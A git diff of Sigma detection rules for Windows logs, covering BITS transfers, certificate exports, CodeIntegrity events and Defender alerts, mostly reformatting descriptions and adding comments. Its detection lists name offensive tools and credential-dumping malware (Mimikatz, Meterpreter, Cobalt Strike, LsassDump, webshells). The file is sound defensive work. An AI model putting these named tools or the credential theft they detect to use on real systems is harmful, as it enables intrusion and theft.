a/sigma/builtin/bits_client/win_bits_client_new_trasnfer_susp_local_folder.yml +++ b/sigma/builtin/bits_client/win_bits_client_new_trasnfer_susp_local_folder.yml @@ -1,8 +1,7 @@ title: BITS Transfer Job Download To Potential Suspicious Folder id: f8a56cb7-a363-44ed-a82f-5926bb44cd05 status: experimental -description: Detects new BITS transfer job where the LocalName/Saved file is stored - in a potentially suspicious location +description: Detects new BITS transfer job where the LocalName/Saved file is stored in a potentially suspicious location references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1197/T1197.md author: Florian Roth (Nextron Systems) @@ -21,6 +20,7 @@ detection: selection: EventID: 16403 LocalName|contains: + # TODO: Add more interesting suspicious paths - \Desktop\ - C:\Users\Public\ - C:\PerfLogs\ diff --git a/sigma/builtin/capi2/win_capi2_acquire_certificate_private_key.yml b/sigma/builtin/capi2/win_capi2_acquire_certificate_private_key.yml index e8bd68c49..d61e45198 100644 --- a/sigma/builtin/capi2/win_capi2_acquire_certificate_private_key.yml +++ b/sigma/builtin/capi2/win_capi2_acquire_certificate_private_key.yml @@ -17,10 +17,9 @@ detection: capi2: Channel: Microsoft-Windows-CAPI2/Operational selection: - EventID: 70 + EventID: 70 # Acquire Certificate Private Key condition: capi2 and selection falsepositives: - - Legitimate application requesting certificate exports will trigger this. Apply - additional filters as needed + - Legitimate application requesting certificate exports will trigger this. Apply additional filters as needed level: medium ruletype: Sigma diff --git a/sigma/builtin/category/antivirus/av_exploiting.yml b/sigma/builtin/category/antivirus/av_exploiting.yml index 1abff9da4..3ac97d0b9 100644 --- a/sigma/builtin/category/antivirus/av_exploiting.yml +++ b/sigma/builtin/category/antivirus/av_exploiting.yml @@ -1,8 +1,7 @@ title: Antivirus Exploitation Framework Detection id: 238527ad-3c2c-4e4f-a1f6-92fd63adb864 status: stable -description: Detects a highly relevant Antivirus alert that reports an exploitation - framework +description: Detects a highly relevant Antivirus alert that reports an exploitation framework references: - https://www.nextron-systems.com/?s=antivirus - https://www.virustotal.com/gui/file/925b0b28472d4d79b4bf92050e38cc2b8f722691c713fc28743ac38551bc3797 @@ -22,7 +21,7 @@ logsource: service: windefend detection: antivirus: - EventID: + EventID: # https://learn.microsoft.com/en-us/microsoft-365/security/defender-endpoint/troubleshoot-microsoft-defender-antivirus IDs with existing 'Threat Name' or 'Path' - 1006 - 1007 - 1008 diff --git a/sigma/builtin/category/antivirus/av_hacktool.yml b/sigma/builtin/category/antivirus/av_hacktool.yml index 981daeb5c..15567e5d0 100644 --- a/sigma/builtin/category/antivirus/av_hacktool.yml +++ b/sigma/builtin/category/antivirus/av_hacktool.yml @@ -1,8 +1,7 @@ title: Antivirus Hacktool Detection id: fa0c05b6-8ad3-468d-8231-c1cbccb64fba status: stable -description: Detects a highly relevant Antivirus alert that reports a hack tool or - other attack tool +description: Detects a highly relevant Antivirus alert that reports a hack tool or other attack tool references: - https://www.nextron-systems.com/2021/08/16/antivirus-event-analysis-cheat-sheet-v1-8-2/ - https://www.nextron-systems.com/?s=antivirus @@ -18,7 +17,7 @@ logsource: service: windefend detection: antivirus: - EventID: + EventID: # https://learn.microsoft.com/en-us/microsoft-365/security/defender-endpoint/troubleshoot-microsoft-defender-antivirus IDs with existing 'Threat Name' or 'Path' - 1006 - 1007 - 1008 @@ -35,50 +34,51 @@ detection: - 1116 Channel: Microsoft-Windows-Windows Defender/Operational selection: - - ThreatName|startswith: - - HTOOL - - HKTL - - SecurityTool - - Adfind - - ATK/ - - Exploit.Script.CVE - - PWS. - - PWSX - - ThreatName|contains: - - Hacktool - - ATK/ - - Potato - - Rozena - - Sbelt - - Seatbelt - - SecurityTool - - SharpDump - - Sliver - - Splinter - - Swrort - - Impacket - - Koadic - - Lazagne - - Metasploit - - Meterpreter - - MeteTool - - Mimikatz - - Mpreter - - Nighthawk - - PentestPowerShell - - PowerSploit - - PowerSSH - - PshlSpy - - PSWTool - - PWCrack - - Brutel - - BruteR - - Cobalt - - COBEACON - - Cometer - - DumpCreds - - FastReverseProxy - - PWDump + - ThreatName|startswith: + - HTOOL + - HKTL + - SecurityTool + - Adfind + - ATK/ + - Exploit.Script.CVE + # - 'FRP.' + - PWS. + - PWSX + - ThreatName|contains: + - Hacktool + - ATK/ # Sophos + - Potato + - Rozena + - Sbelt + - Seatbelt + - SecurityTool + - SharpDump + - Sliver + - Splinter + - Swrort + - Impacket + - Koadic + - Lazagne + - Metasploit + - Meterpreter + - MeteTool + - Mimikatz + - Mpreter + - Nighthawk + - PentestPowerShell + - PowerSploit + - PowerSSH + - PshlSpy + - PSWTool + - PWCrack + - Brutel + - BruteR + - Cobalt + - COBEACON + - Cometer + - DumpCreds + - FastReverseProxy + - PWDump condition: antivirus and selection falsepositives: - Unlikely diff --git a/sigma/builtin/category/antivirus/av_password_dumper.yml b/sigma/builtin/category/antivirus/av_password_dumper.yml index e704e4769..401b08f6b 100644 --- a/sigma/builtin/category/antivirus/av_password_dumper.yml +++ b/sigma/builtin/category/antivirus/av_password_dumper.yml @@ -21,7 +21,7 @@ logsource: service: windefend detection: antivirus: - EventID: + EventID: # https://learn.microsoft.com/en-us/microsoft-365/security/defender-endpoint/troubleshoot-microsoft-defender-antivirus IDs with existing 'Threat Name' or 'Path' - 1006 - 1007 - 1008 @@ -38,24 +38,24 @@ detection: - 1116 Channel: Microsoft-Windows-Windows Defender/Operational selection: - - ThreatName|startswith: PWS - - ThreatName|contains: - - DumpCreds - - Mimikatz - - PWCrack - - HTool/WCE - - PSWTool - - PWDump - - SecurityTool - - PShlSpy - - Rubeus - - Kekeo - - LsassDump - - Outflank - - DumpLsass - - SharpDump - - PWSX - - PWS. + - ThreatName|startswith: PWS + - ThreatName|contains: + - DumpCreds + - Mimikatz + - PWCrack + - HTool/WCE + - PSWTool + - PWDump + - SecurityTool + - PShlSpy + - Rubeus + - Kekeo + - LsassDump + - Outflank + - DumpLsass + - SharpDump + - PWSX + - PWS. condition: antivirus and selection falsepositives: - Unlikely diff --git a/sigma/builtin/category/antivirus/av_ransomware.yml b/sigma/builtin/category/antivirus/av_ransomware.yml index 12fe2ed3d..044ed3c27 100644 --- a/sigma/builtin/category/antivirus/av_ransomware.yml +++ b/sigma/builtin/category/antivirus/av_ransomware.yml @@ -20,7 +20,7 @@ logsource: service: windefend detection: antivirus: - EventID: + EventID: # https://learn.microsoft.com/en-us/microsoft-365/security/defender-endpoint/troubleshoot-microsoft-defender-antivirus IDs with existing 'Threat Name' or 'Path' - 1006 - 1007 - 1008 diff --git a/sigma/builtin/category/antivirus/av_relevant_files.yml b/sigma/builtin/category/antivirus/av_relevant_files.yml index 0b04dd5fe..cab783e17 100644 --- a/sigma/builtin/category/antivirus/av_relevant_files.yml +++ b/sigma/builtin/category/antivirus/av_relevant_files.yml @@ -1,8 +1,7 @@ title: Antivirus Relevant File Paths Alerts id: c9a88268-0047-4824-ba6e-4d81ce0b907c status: test -description: Detects an Antivirus alert in a highly relevant file path or with a relevant - file name +description: Detects an Antivirus alert in a highly relevant file path or with a relevant file name references: - https://www.nextron-systems.com/?s=antivirus author: Florian Roth (Nextron Systems), Arnim Rupp @@ -17,7 +16,7 @@ logsource: service: windefend detection: antivirus: - EventID: + EventID: # https://learn.microsoft.com/en-us/microsoft-365/security/defender-endpoint/troubleshoot-microsoft-defender-antivirus IDs with existing 'Threat Name' or 'Path' - 1006 - 1007 - 1008 @@ -35,11 +34,13 @@ detection: Channel: Microsoft-Windows-Windows Defender/Operational selection_path: Path|contains: + # could be startswith, if there is a better backend handling - :\Windows\ - :\Temp\ - :\PerfLogs\ - :\Users\Public\ - :\Users\Default\ + # true 'contains' matches: - \Client\ - \tsclient\ - \inetpub\ diff --git a/sigma/builtin/category/antivirus/av_webshell.yml b/sigma/builtin/category/antivirus/av_webshell.yml index f7388a5a9..94ea3ca22 100644 --- a/sigma/builtin/category/antivirus/av_webshell.yml +++ b/sigma/builtin/category/antivirus/av_webshell.yml @@ -1,10 +1,7 @@ title: Antivirus Web Shell Detection id: fdf135a2-9241-4f96-a114-bb404948f736 status: test -description: Detects a highly relevant Antivirus alert that reports a web shell. It's - highly recommended to tune this rule to the specific strings used by your anti - virus solution by downloading a big webshell repo from e.g. github and checking - the matches. +description: Detects a highly relevant Antivirus alert that reports a web shell. It's highly recommended to tune this rule to the specific strings used by your anti virus solution by downloading a big webshell repo from e.g. github and checking the matches. references: - https://www.nextron-systems.com/?s=antivirus - https://github.com/tennc/webshell @@ -28,7 +25,7 @@ logsource: service: windefend detection: antivirus: - EventID: + EventID: # https://learn.microsoft.com/en-us/microsoft-365/security/defender-endpoint/troubleshoot-microsoft-defender-antivirus IDs with existing 'Threat Name' or 'Path' - 1006 - 1007 - 1008 @@ -45,60 +42,60 @@ detection: - 1116 Channel: Microsoft-Windows-Windows Defender/Operational selection: - - ThreatName|startswith: - - PHP. - - JSP. - - ASP. - - Perl. - - VBS/Uxor - - IIS/BackDoor - - JAVA/Backdoor - - Troj/ASP - - Troj/PHP - - Troj/JSP - - ThreatName|contains: - - Webshell - - Chopper - - SinoChoper - - ASPXSpy - - Aspdoor - - filebrowser - - PHP_ - - JSP_ - - ASP_ - - 'PHP:' - - 'JSP:' - - 'ASP:' - - 'Perl:' - - PHP/ - - JSP/ - - ASP/ - - Perl/ - - PHPShell - - Trojan.PHP - - Trojan.ASP - - Trojan.JSP - - Trojan.VBS - - PHP/Agent - - ASP/Agent - - JSP/Agent - - VBS/Agent - - Backdoor/PHP - - Backdoor/JSP - - Backdoor/ASP - - Backdoor/VBS - - Backdoor/Java - - PHP.Agent - - ASP.Agent - - JSP.Agent - - VBS.Agent - - Backdoor.PHP - - Backdoor.JSP - - Backdoor.ASP - - Backdoor.VBS - - Backdoor.Java - - PShlSpy - - C99shell + - ThreatName|startswith: + - PHP. + - JSP. + - ASP. + - Perl. + - VBS/Uxor # looking for 'VBS/' would also find downloaders and droppers meant for desktops + - IIS/BackDoor + - JAVA/Backdoor + - Troj/ASP + - Troj/PHP + - Troj/JSP + - ThreatName|contains: + - Webshell + - Chopper + - SinoChoper + - ASPXSpy + - Aspdoor + - filebrowser + - PHP_ + - JSP_ + - ASP_ # looking for 'VBS_' would also find downloaders and droppers meant for desktops + - 'PHP:' + - 'JSP:' + - 'ASP:' + - 'Perl:' + - PHP/ + - JSP/ + - ASP/ + - Perl/ + - PHPShell + - Trojan.PHP + - Trojan.ASP + - Trojan.JSP + - Trojan.VBS + - PHP/Agent + - ASP/Agent + - JSP/Agent + - VBS/Agent + - Backdoor/PHP + - Backdoor/JSP + - Backdoor/ASP + - Backdoor/VBS + - Backdoor/Java + - PHP.Agent + - ASP.Agent + - JSP.Agent + - VBS.Agent + - Backdoor.PHP + - Backdoor.JSP + - Backdoor.ASP + - Backdoor.VBS + - Backdoor.Java + - PShlSpy + - C99shell condition: antivirus and selection falsepositives: - Unlikely diff --git a/sigma/builtin/certificate_services_client_lifecycle_system/win_certificateservicesclient_lifecycle_system_cert_exported.yml b/sigma/builtin/certificate_services_client_lifecycle_system/win_certificateservicesclient_lifecycle_system_cert_exported.yml index 3251ed5a7..037d75920 100644 --- a/sigma/builtin/certificate_services_client_lifecycle_system/win_certificateservicesclient_lifecycle_system_cert_exported.yml +++ b/sigma/builtin/certificate_services_client_lifecycle_system/win_certificateservicesclient_lifecycle_system_cert_exported.yml @@ -1,8 +1,7 @@ title: Certificate Exported From Local Certificate Store id: 58c0bff0-40a0-46e8-b5e8-b734b84d2017 status: experimental -description: Detects when an application exports a certificate (and potentially the - private key as well) from the local Windows certificate store. +description: Detects when an application exports a certificate (and potentially the private key as well) from the local Windows certificate store. references: - https://www.splunk.com/en_us/blog/security/breaking-the-chain-defending-against-certificate-services-abuse.html author: Zach Mathis @@ -17,10 +16,9 @@ detection: certificateservicesclient_lifecycle_system: Channel: Microsoft-Windows-CertificateServicesClient-Lifecycle-System/Operational selection: - EventID: 1007 + EventID: 1007 # A certificate has been exported condition: certificateservicesclient_lifecycle_system and selection falsepositives: - - Legitimate application requesting certificate exports will trigger this. Apply - additional filters as needed + - Legitimate application requesting certificate exports will trigger this. Apply additional filters as needed level: medium ruletype: Sigma diff --git a/sigma/builtin/code_integrity/win_codeintegrity_attempted_dll_load.yml b/sigma/builtin/code_integrity/win_codeintegrity_attempted_dll_load.yml index ed13822b9..1f6c76eb0 100644 --- a/sigma/builtin/code_integrity/win_codeintegrity_attempted_dll_load.yml +++ b/sigma/builtin/code_integrity/win_codeintegrity_attempted_dll_load.yml @@ -1,13 +1,9 @@ title: CodeIntegrity - Unmet Signing Level Requirements By File Under Validation id: f8931561-97f5-4c46-907f-0a4a592e47a7 status: experimental -description: 'Detects attempted file load events that did not meet the signing level - requirements. It often means the file''s signature is revoked or a signature with - the Lifetime Signing EKU has expired. - +description: | + Detects attempted file load events that did not meet the signing level requirements. It often means the file's signature is revoked or a signature with the Lifetime Signing EKU has expired. This event is best correlated with EID 3089 to determine the error of the validation. - - ' references: - https://twitter.com/SBousseaden/status/1483810148602814466 - https://github.com/MicrosoftDocs/windows-itpro-docs/blob/40fe118976734578f83e5e839b9c63ae7a4af82d/windows/security/threat-protection/windows-defender-application-control/event-id-explanations.md#windows-codeintegrity-operational-log @@ -26,17 +22,21 @@ detection: Channel: Microsoft-Windows-CodeIntegrity/Operational selection: EventID: - - 3033 - - 3034 + - 3033 # Code Integrity determined that a process (%4) attempted to load %2 that did not meet the %5 signing level requirements. + - 3034 # Code Integrity determined that a process (%4) attempted to load %2 that did not meet the %5 signing level requirements or violated code integrity policy. However, due to code integrity auditing policy, the image was allowed to load. filter_optional_dtrace: + # Example: Code Integrity determined that a process (\Device\HarddiskVolume5\Windows\System32\svchost.exe) attempted to load \Device\HarddiskVolume5\Program Files\DTrace\dtrace.dll that did not meet the Windows signing level requirements. FileNameBuffer|endswith: \Program Files\DTrace\dtrace.dll ProcessNameBuffer|endswith: \Windows\System32\svchost.exe RequestedPolicy: 12 filter_optional_av_generic: + # Example: Code Integrity determined that a process (\Device\HarddiskVolume5\ProgramData\Microsoft\Windows Defender\Platform\4.18.2207.7-0\MsMpEng.exe) attempted to load \Device\HarddiskVolume5\Windows\System32\DriverStore\FileRepository\iigd_dch.inf_amd64_36fb67bd6dbd887d\igd10iumd64.dll that did not meet the Custom 3 / Antimalware signing level requirements. FileNameBuffer|contains: \Windows\System32\DriverStore\FileRepository\ FileNameBuffer|endswith: \igd10iumd64.dll + # ProcessNameBuffer is AV products RequestedPolicy: 7 filter_optional_electron_based_app: + # Example: Code Integrity determined that a process (\Device\HarddiskVolume5\Users\user\AppData\Local\Keybase\Gui\Keybase.exe) attempted to load \Device\HarddiskVolume5\Windows\System32\nvspcap64.dll that did not meet the Microsoft signing level requirements. FileNameBuffer|endswith: \Windows\System32\nvspcap64.dll ProcessNameBuffer|endswith: - \AppData\Local\Keybase\Gui\Keybase.exe @@ -51,16 +51,19 @@ detection: - 8 - 12 filter_optional_msoffice: - FileNameBuffer|contains: \Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft - Shared\OFFICE + FileNameBuffer|contains: \Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE FileNameBuffer|endswith: \MSOXMLMF.DLL + # ProcessNameBuffer is AV products RequestedPolicy: 7 filter_optional_slack: + # Example: https://user-images.githubusercontent.com/112784902/197407680-96d4b662-8a59-4289-a483-b24d630ac2a9.png + # Even though it's the same DLL as the one used in the electron based app filter. We need to do a separate selection due to slack's folder naming convention with the version number :) FileNameBuffer|endswith: \Windows\System32\nvspcap64.dll ProcessNameBuffer|contains: \AppData\Local\slack\app- ProcessNameBuffer|endswith: \slack.exe RequestedPolicy: 8 filter_optional_firefox: + # Example: https://user-images.githubusercontent.com/62423083/197451483-70e89010-ed96-4357-8079-b5a061a239d6.png FileNameBuffer|endswith: - \Mozilla Firefox\mozavcodec.dll - \Mozilla Firefox\mozavutil.dll @@ -74,11 +77,13 @@ detection: - 8 - 12 filter_main_gac: + # Filtering the path containing this string because of multiple possible DLLs in that location FileNameBuffer|contains: \Windows\assembly\GAC\ ProcessNameBuffer|endswith: \mscorsvw.exe ProcessNameBuffer|contains: \Windows\Microsoft.NET\ RequestedPolicy: 8 filter_optional_google_drive: + # Example: \Program Files\Google\Drive File Stream\67.0.2.0\crashpad_handler.exe FileNameBuffer|contains: \Program Files\Google\Drive File Stream\ FileNameBuffer|endswith: \crashpad_handler.exe ProcessNameBuffer|endswith: \Windows\ImmersiveControlPanel\SystemSettings.exe @@ -87,18 +92,15 @@ detection: FileNameBuffer|endswith: \Trend Micro\Client Server Security Agent\perficrcperfmonmgr.dll RequestedPolicy: 8 filter_optional_mdns_responder: - FileNameBuffer|endswith: '\Program Files\National Instruments\Shared\mDNS - Responder\nimdnsNSP.dll ' + FileNameBuffer|endswith: '\Program Files\National Instruments\Shared\mDNS Responder\nimdnsNSP.dll ' filter_optional_mcafee: FileNameBuffer|endswith: - \Program Files\McAfee\Endpoint Security\Threat Prevention\MfeAmsiProvider.dll - \Program Files\McAfee\MfeAV\AMSIExt.dll filter_optional_eset: FileNameBuffer|endswith: \Program Files\ESET\ESET Security\eamsi.dll - condition: codeintegrity_operational and (selection and not 1 of filter_main_* - and not 1 of filter_optional_*) + condition: codeintegrity_operational and (selection and not 1 of filter_main_* and not 1 of filter_optional_*) falsepositives: - - Antivirus and other third party products are known to trigger this rule quite - a lot. Initial filters and tuning is required before using this rule. + - Antivirus and other third party products are known to trigger this rule quite a lot. Initial filters and tuning is required before using this rule. level: low ruletype: Sigma diff --git a/sigma/builtin/code_integrity/win_codeintegrity_blocked_protected_process_file.yml b/sigma/builtin/code_integrity/win_codeintegrity_blocked_protected_process_file.yml index 86a098202..2344d95f3 100644 --- a/sigma/builtin/code_integrity/win_codeintegrity_blocked_protected_process_file.yml +++ b/sigma/builtin/code_integrity/win_codeintegrity_blocked_protected_process_file.yml @@ -1,8 +1,7 @@ title: CodeIntegrity - Disallowed File For Protected Processes Has Been Blocked id: 5daf11c3-022b-4969-adb9-365e6c078c7c status: experimental -description: Detects block events for files that are disallowed by code integrity - for protected processes +description: Detects block events for files that are disallowed by code integrity for protected processes references: - https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/event-id-explanations - https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/event-tag-explanations @@ -18,7 +17,7 @@ detection: codeintegrity_operational: Channel: Microsoft-Windows-CodeIntegrity/Operational selection: - EventID: 3104 + EventID: 3104 # Windows blocked file %2 which has been disallowed for protected processes. condition: codeintegrity_operational and selection falsepositives: - Unlikely diff --git a/sigma/builtin/code_integrity/win_codeintegrity_enforced_policy_block.yml b/sigma/builtin/code_integrity/win_codeintegrity_enforced_policy_block.yml index 494377f01..6ba9a0877 100644 --- a/sigma/builtin/code_integrity/win_codeintegrity_enforced_policy_block.yml +++ b/sigma/builtin/code_integrity/win_codeintegrity_enforced_policy_block.yml @@ -1,8 +1,7 @@ title: CodeIntegrity - Blocked Image/Driver Load For Policy Violation id: e4be5675-4a53-426a-8c81-a8bb2387e947 status: experimental -description: Detects blocked load events that did not meet the authenticode signing - level requirements or violated the code integrity policy. +description: Detects blocked load events that did not meet the authenticode signing level requirements or violated the code integrity policy. references: - https://twitter.com/wdormann/status/1590434950335320065 - https://github.com/MicrosoftDocs/windows-itpro-docs/blob/40fe118976734578f83e5e839b9c63ae7a4af82d/windows/security/threat-protection/windows-defender-application-control/event-id-explanations.md#windows-codeintegrity-operational-log @@ -20,7 +19,7 @@ detection: codeintegrity_operational: Channel: Microsoft-Windows-CodeIntegrity/Operational selection: - EventID: 3077 + EventID: 3077 # Code Integrity determined that a process (%4) attempted to load %2 that did not meet the %5 signing level requirements or violated code integrity policy (Policy ID:%XX). condition: codeintegrity_operational and selection falsepositives: - Unknown diff --git a/sigma/builtin/code_integrity/win_codeintegrity_revoked_driver_blocked.yml b/sigma/builtin/code_integrity/win_codeintegrity_revoked_driver_blocked.yml index 6f1e5c39a..cf72d4d5a 100644 --- a/sigma/builtin/code_integrity/win_codeintegrity_revoked_driver_blocked.yml +++ b/sigma/builtin/code_integrity/win_codeintegrity_revoked_driver_blocked.yml @@ -18,7 +18,7 @@ detection: codeintegrity_operational: Channel: Microsoft-Windows-CodeIntegrity/Operational selection: - EventID: 3023 + EventID: 3023 # The driver %2 is blocked from loading as the driver has been revoked by Microsoft. condition: codeintegrity_operational and selection falsepositives: - Unknown diff --git a/sigma/builtin/code_integrity/win_codeintegrity_revoked_driver_loaded.yml b/sigma/builtin/code_integrity/win_codeintegrity_revoked_driver_loaded.yml index 179fcefa7..afaff2738 100644 --- a/sigma/builtin/code_integrity/win_codeintegrity_revoked_driver_loaded.yml +++ b/sigma/builtin/code_integrity/win_codeintegrity_revoked_driver_loaded.yml @@ -18,8 +18,8 @@ detection: Channel: Microsoft-Windows-CodeIntegrity/Operational selection: EventID: - - 3021 - - 3022 + - 3021 # Code Integrity determined a revoked kernel module %2 is loaded into the system. Check with the publisher to see if a new signed version of the kernel module is available. + - 3022 # Code Integrity determined a revoked kernel module %2 is loaded into the system. The image is allowed to load because kernel mode debugger is attached. condition: codeintegrity_operational and selection falsepositives: - Unlikely diff --git a/sigma/builtin/code_integrity/win_codeintegrity_revoked_image_blocked.yml b/sigma/builtin/code_integrity/win_codeintegrity_revoked_image_blocked.yml index 56ed79680..f150675f7 100644 --- a/sigma/builtin/code_integrity/win_codeintegrity_revoked_image_blocked.yml +++ b/sigma/builtin/code_integrity/win_codeintegrity_revoked_image_blocked.yml @@ -17,7 +17,7 @@ detection: codeintegrity_operational: Channel: Microsoft-Windows-CodeIntegrity/Operational selection: - EventID: 3036 + EventID: 3036 # Windows is unable to verify the integrity of the file %2 because the signing certificate has been revoked. Check with the publisher to see if a new signed version of the kernel module is available. condition: codeintegrity_operational and selection falsepositives: - Unlikely diff --git a/sigma/builtin/code_integrity/win_codeintegrity_revoked_image_loaded.yml b/sigma/builtin/code_integrity/win_codeintegrity_revoked_image_loaded.yml index b33e8d153..232801454 100644 --- a/sigma/builtin/code_integrity/win_codeintegrity_revoked_image_loaded.yml +++ b/sigma/builtin/code_integrity/win_codeintegrity_revoked_image_loaded.yml @@ -18,8 +18,8 @@ detection: Channel: Microsoft-Windows-CodeIntegrity/Operational selection: EventID: - - 3032 - - 3035 + - 3032 # Code Integrity determined a revoked image %2 is loaded into the system. Check with the publisher to see if a new signed version of the image is available. + - 3035 # Code Integrity determined a revoked image %2 is loaded into the system. The image is allowed to load because kernel mode debugger is attached. condition: codeintegrity_operational and selection falsepositives: - Unlikely diff --git a/sigma/builtin/code_integrity/win_codeintegrity_unsigned_driver_loaded.yml b/sigma/builtin/code_integrity/win_codeintegrity_unsigned_driver_loaded.yml index 2d0634035..f7e1bed39 100644 --- a/sigma/builtin/code_integrity/win_codeintegrity_unsigned_driver_loaded.yml +++ b/sigma/builtin/code_integrity/win_codeintegrity_unsigned_driver_loaded.yml @@ -17,7 +17,7 @@ detection: codeintegrity_operational: Channel: Microsoft-Windows-CodeIntegrity/Operational selection: - EventID: 3001 + EventID: 3001 # Code Integrity determined an unsigned kernel module %2 is loaded into the system. Check with the publisher to see if a signed version of the kernel module is available condition: codeintegrity_operational and selection falsepositives: - Unlikely diff --git a/sigma/builtin/code_integrity/win_codeintegrity_unsigned_image_loaded.yml b/sigma/builtin/code_integrity/win_codeintegrity_unsigned_image_loaded.yml index fee21c84a..a34397684 100644 --- a/sigma/builtin/code_integrity/win_codeintegrity_unsigned_image_loaded.yml +++ b/sigma/builtin/code_integrity/win_codeintegrity_unsigned_image_loaded.yml @@ -17,7 +17,7 @@ detection: codeintegrity_operational: Channel: Microsoft-Windows-CodeIntegrity/Operational selection: - EventID: 3037 + EventID: 3037 # Code Integrity determined an unsigned image %2 is loaded into the system. Check with the publisher to see if a signed version of the image is available. condition: codeintegrity_operational and selection falsepositives: - Unlikely diff --git a/sigma/builtin/code_integrity/win_codeintegrity_whql_failure.yml b/sigma/builtin/code_integrity/win_codeintegrity_whql_failure.yml index bbecd5c25..0d61abd52 100644 --- a/sigma/builtin/code_integrity/win_codeintegrity_whql_failure.yml +++ b/sigma/builtin/code_integrity/win_codeintegrity_whql_failure.yml @@ -19,8 +19,8 @@ detection: Channel: Microsoft-Windows-CodeIntegrity/Operational selection: EventID: - - 3082 - - 3083 + - 3082 # Code Integrity determined kernel module %2 that did not meet the WHQL requirements is loaded into the system. However, due to code integrity auditing policy, the image was allowed to load + - 3083 # Code Integrity determined kernel module %2 that did not meet the WHQL requirements is loaded into the system. Check with the publisher to see if a WHQL compliant kernel module is available filter_optional_vmware: FileNameBuffer: - system32\drivers\vsock.sys diff --git a/sigma/builtin/deprecated/posh_pm_powercat.yml b/sigma/builtin/deprecated/posh_pm_powercat.yml index f3a803386..f0b3c0fa1 100644 --- a/sigma/builtin/deprecated/posh_pm_powercat.yml +++ b/sigma/builtin/deprecated/posh_pm_powercat.yml @@ -1,8 +1,7 @@ title: Netcat The Powershell Version - PowerShell Module id: bf7286e7-c0be-460b-a7e8-5b2e07ecc2f2 status: deprecated -description: Adversaries may use a non-application layer protocol for communication - between host and C2 server or among infected hosts within a network +description: Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network references: - https://nmap.org/ncat/ - https://github.com/besimorhino/powercat diff --git a/sigma/builtin/deprecated/posh_ps_access_to_chrome_login_data.yml b/sigma/builtin/deprecated/posh_ps_access_to_chrome_login_data.yml index 32141e2ec..32d087621 100644 --- a/sigma/builtin/deprecated/posh_ps_access_to_chrome_login_data.yml +++ b/sigma/builtin/deprecated/posh_ps_access_to_chrome_login_data.yml @@ -4,16 +4,10 @@ status: deprecated author: frack113 date: 2021/12/20 modified: 2022/05/14 -description: 'Adversaries may acquire credentials from web browsers by reading files - specific to the target browser. - - Web browsers commonly save credentials such as website usernames and passwords - so that they do not need to be entered manually in the future. - - Web browsers typically store the credentials in an encrypted format within a credential - store. - - ' +description: | + Adversaries may acquire credentials from web browsers by reading files specific to the target browser. + Web browsers commonly save credentials such as website usernames and passwords so that they do not need to be entered manually in the future. + Web browsers typically store the credentials in an encrypted format within a credential store. references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1555.003/T1555.003.md logsource: diff --git a/sigma/builtin/deprecated/posh_ps_azurehound_commands.yml b/sigma/builtin/deprecated/posh_ps_azurehound_commands.yml index 5a9dd2ae1..11c36e4fd 100644 --- a/sigma/builtin/deprecated/posh_ps_azurehound_commands.yml +++ b/sigma/builtin/deprecated/posh_ps_azurehound_commands.yml @@ -1,8 +1,7 @@ title: AzureHound PowerShell Commands id: 83083ac6-1816-4e76-97d7-59af9a9ae46e status: deprecated -description: Detects the execution of AzureHound in PowerShell, a tool to gather data - from Azure for BloodHound +description: Detects the execution of AzureHound in PowerShell, a tool to gather data from Azure for BloodHound references: - https://github.com/BloodHoundAD/BloodHound/blob/0927441f67161cc6dc08a53c63ceb8e333f55874/Collectors/AzureHound.ps1 - https://bloodhound.readthedocs.io/en/latest/data-collection/azurehound.html diff --git a/sigma/builtin/deprecated/posh_ps_cl_mutexverifiers_lolscript.yml b/sigma/builtin/deprecated/posh_ps_cl_mutexverifiers_lolscript.yml index 731300577..fe3a486ae 100644 --- a/sigma/builtin/deprecated/posh_ps_cl_mutexverifiers_lolscript.yml +++ b/sigma/builtin/deprecated/posh_ps_cl_mutexverifiers_lolscript.yml @@ -1,8 +1,7 @@ title: Execution via CL_Mutexverifiers.ps1 id: 39776c99-1c7b-4ba0-b5aa-641525eee1a4 status: deprecated -description: Detects Execution via runAfterCancelProcess in CL_Mutexverifiers.ps1 - module +description: Detects Execution via runAfterCancelProcess in CL_Mutexverifiers.ps1 module references: - https://lolbas-project.github.io/lolbas/Scripts/CL_mutexverifiers/ - https://twitter.com/pabraeken/status/995111125447577600 diff --git a/sigma/builtin/deprecated/posh_ps_file_and_directory_discovery.yml b/sigma/builtin/deprecated/posh_ps_file_and_directory_discovery.yml index 18dd917ce..e76013dc6 100644 --- a/sigma/builtin/deprecated/posh_ps_file_and_directory_discovery.yml +++ b/sigma/builtin/deprecated/posh_ps_file_and_directory_discovery.yml @@ -1,16 +1,10 @@ title: Powershell File and Directory Discovery id: d23f2ba5-9da0-4463-8908-8ee47f614bb9 status: deprecated -description: 'Adversaries may enumerate files and directories or may search in specific - locations of a host or network share for certain information within a file system. - - Adversaries may use the information from [File and Directory Discovery](https://attack.mitre.org/techniques/T1083) - during automated discovery to shape follow-on behaviors, - - including whether or not the adversary fully infects the target and/or attempts - specific actions. - - ' +description: | + Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. + Adversaries may use the information from [File and Directory Discovery](https://attack.mitre.org/techniques/T1083) during automated discovery to shape follow-on behaviors, + including whether or not the adversary fully infects the target and/or attempts specific actions. references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1083/T1083.md author: frack113 diff --git a/sigma/builtin/deprecated/posh_ps_susp_gwmi.yml b/sigma/builtin/deprecated/posh_ps_susp_gwmi.yml index ce492e176..71c2bc83e 100644 --- a/sigma/builtin/deprecated/posh_ps_susp_gwmi.yml +++ b/sigma/builtin/deprecated/posh_ps_susp_gwmi.yml @@ -1,8 +1,7 @@ title: Suspicious Get-WmiObject id: 0332a266-b584-47b4-933d-a00b103e1b37 status: deprecated -description: The infrastructure for management data and operations that enables local - and remote management of Windows personal computers and servers +description: The infrastructure for management data and operations that enables local and remote management of Windows personal computers and servers references: - https://attack.mitre.org/datasources/DS0005/ - 